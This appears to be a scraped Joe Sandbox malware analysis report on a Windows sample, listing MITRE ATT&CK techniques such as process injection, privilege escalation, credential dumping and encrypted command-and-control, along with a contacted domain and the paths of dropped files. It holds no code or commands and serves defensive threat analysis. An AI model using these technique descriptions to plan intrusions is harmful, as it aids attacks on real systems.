Source: global traffic	DNS traffic detected: DNS query: www.iglpg.online

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zAg7xx1vKI.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zAg7xx1vKI.exe.log

C:\Users\user\AppData\Local\Temp\t577G2K6

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
zAg7xx1vKI.exe

Function 00E6D5B9 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Function 00E6D5C8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 06F1E2AC Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Function 06F1E2B8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 00E6AF19 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Function 00E6590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 00E6449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 06F1DA90 Relevance: 1.6, APIs: 1, Instructions: 74
threadCOMMON

Function 06F1DC28 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Function 00E6D808 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre